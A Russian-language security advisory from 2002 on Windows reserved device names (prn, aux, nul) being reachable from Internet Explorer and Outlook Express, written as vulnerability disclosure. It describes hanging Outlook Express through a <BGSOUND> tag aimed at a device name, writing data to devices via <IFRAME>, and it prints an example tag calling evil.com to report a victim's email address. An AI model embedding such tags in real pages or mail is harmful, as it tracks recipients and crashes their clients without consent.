Доступ к специальным устройствам в Internet Explorer
| Дата публикации: | 15.05.2002 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1019 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Во всех версиях Windows есть зарезервированные имена файлов, которые относятся к специальным устройствам (называемые так же DOS-устройства), такие как prn, aux, nul и т.д. Имя устройства не зависит от пути к каталогу, расширения файла и т.д. (т.е. c:\temp\prn.tmp является специальным устройством prn). Для работы со специальными устройствами применяется тот же API что и для работы с обычными файлами. Несанкционированный доступ к специальным устройствам может привести к различным неприятным последствиям начиная с некорректной работы службы или программы, производящей попытку доступа к файлу и заканчивая повреждением физического устройства или компрометацией важных данных. Описание проблемы: ERRor обнаружил, что с помощью тэга <BGSOUND> в сочетании со специальным именем устройства можно вызвать зависание Outlook Express. При этом возвращение программы в рабочее состояние без потери архива писем является нетривиальной задачей. Во время исследования этой проблемы было выявлено, что с помощью тэга <IFRAME> можно послать любые данные в специальное устройство. Так же, проблемой является то, что исходный файл тэга <BGSOUND> загружается всегда и слюбого сайта независимо от установок зоны безопасности. Это делает возможным "регистрацию" клиента с помощью <bgsound src="http://evil.com/registerme?email=victim@com.com"> Проблема получения сведений о клиенте обсуждается в [4]. Производитель: Microsoft был проинформирован ?? апреля 2002 года. Не было получено сообщений по данной проблеме с 25 апреля. |
| Ссылки: |
http://www.security.nnov.ru/files/iedos/print.eml http://www.security.nnov.ru/files/iedos/dos.eml |